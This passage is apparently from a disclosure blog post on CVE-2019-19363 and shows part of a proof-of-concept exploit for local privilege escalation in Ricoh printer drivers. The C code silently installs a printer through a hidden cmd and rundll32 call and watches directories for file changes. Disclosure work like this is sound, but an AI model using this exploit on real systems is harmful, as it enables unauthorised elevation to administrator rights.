&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-104"&gt;&lt;code data-line-number="104"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-104" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-104"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;WCHAR&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;cmd_buf&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;1000&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-105"&gt;&lt;code data-line-number="105"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-105" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-105"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;swprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cmd_buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cmd_buf&lt;/span&gt;&lt;span class="p"&gt;),&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="sa"&gt;L&lt;/span&gt;&lt;span class="s"&gt;"/c rundll32 printui.dll, PrintUIEntry /if /b &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s"&gt;Printer&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s"&gt; /r lpt1: /m &lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s"&gt;%s&lt;/span&gt;&lt;span class="se"&gt;\"&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;PrinterName&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-106"&gt;&lt;code data-line-number="106"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-106" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-106"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;wprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;L&lt;/span&gt;&lt;span class="s"&gt;"+ Adding printer: %s&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;cmd_buf&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-107"&gt;&lt;code data-line-number="107"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-107" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-107"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-108"&gt;&lt;code data-line-number="108"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-108" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-108"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="kt"&gt;unsigned&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kt"&gt;long&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;unsigned&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kt"&gt;long&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;ShellExecuteW&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="sa"&gt;L&lt;/span&gt;&lt;span class="s"&gt;"open"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="sa"&gt;L&lt;/span&gt;&lt;span class="s"&gt;"cmd"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;cmd_buf&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;SW_HIDE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-109"&gt;&lt;code data-line-number="109"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-109" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-109"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="k"&gt;if&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;&amp;lt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="c1"&gt;// That seems to be the way to handle ShellExecuteW's ret value.&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-110"&gt;&lt;code data-line-number="110"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-110" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-110"&gt;&lt;/a&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="n"&gt;wprintf&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;L&lt;/span&gt;&lt;span class="s"&gt;"+ Failed launching command. Return value is %d&lt;/span&gt;&lt;span class="se"&gt;\n&lt;/span&gt;&lt;span class="s"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;ret&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-111"&gt;&lt;code data-line-number="111"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-111" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-111"&gt;&lt;/a&gt;&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-112"&gt;&lt;code data-line-number="112"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-112" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-112"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-113"&gt;&lt;code data-line-number="113"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-113" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-113"&gt;&lt;/a&gt;&lt;span class="kt"&gt;void&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;WINAPI&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nf"&gt;WatchDirectories&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;HANDLE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;hCompPort&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-114"&gt;&lt;code data-line-number="114"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-114" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-114"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;DWORD&lt;/span&gt;&lt;span class="w"&gt;   &lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-115"&gt;&lt;code data-line-number="115"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-115" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-115"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;HANDLE&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="n"&gt;hThread&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-116"&gt;&lt;code data-line-number="116"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-116" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-116"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-117"&gt;&lt;code data-line-number="117"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-117" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-117"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;ReadDirectoryChangesW&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;DirInfo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;hDir&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;DirInfo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;lpBuffer&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;MAX_BUFFER&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;TRUE&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;dwNotifyFilter&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;DirInfo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;dwBufLength&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;DirInfo&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Overlapped&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-118"&gt;&lt;code data-line-number="118"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-118" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-118"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-119"&gt;&lt;code data-line-number="119"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-119" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-119"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="c1"&gt;// Create a thread to sit on the directory changes&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-120"&gt;&lt;code data-line-number="120"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-120" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-120"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;hThread&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;CreateThread&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;LPTHREAD_START_ROUTINE&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="n"&gt;HandleDirectoryChange&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;hCompPort&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;tid&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-121"&gt;&lt;code data-line-number="121"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-121" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-121"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-122"&gt;&lt;code data-line-number="122"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-122" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-122"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="c1"&gt;// Just loop and wait for the user to quit&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-123"&gt;&lt;code data-line-number="123"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-123" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-123"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;InstallPrinter&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-124"&gt;&lt;code data-line-number="124"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-124" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-124"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="k"&gt;while&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;_getch&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;!=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="sc"&gt;'q'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-125"&gt;&lt;code data-line-number="125"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-125" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-125"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-126"&gt;&lt;code data-line-number="126"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-126" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-126"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="c1"&gt;// The user has quit - clean up&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-127"&gt;&lt;code data-line-number="127"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-127" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-127"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;PostQueuedCompletionStatus&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hCompPort&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;NULL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-128"&gt;&lt;code data-line-number="128"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-128" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-128"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-129"&gt;&lt;code data-line-number="129"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-129" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-129"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="c1"&gt;// Wait for the Directory thread to finish before exiting&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-130"&gt;&lt;code data-line-number="130"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-130" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-130"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;WaitForSingleObject&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hThread&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;INFINITE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_fb5917bd33d847708bb847e6cfcd6cd3-131"&gt;&lt;code data-line-number="131"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-131" name="rest_code_fb5917bd33d847708bb847e6cfcd6cd3-131"&gt;&lt;/a&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="n"&gt;CloseHandle&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;hThread&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
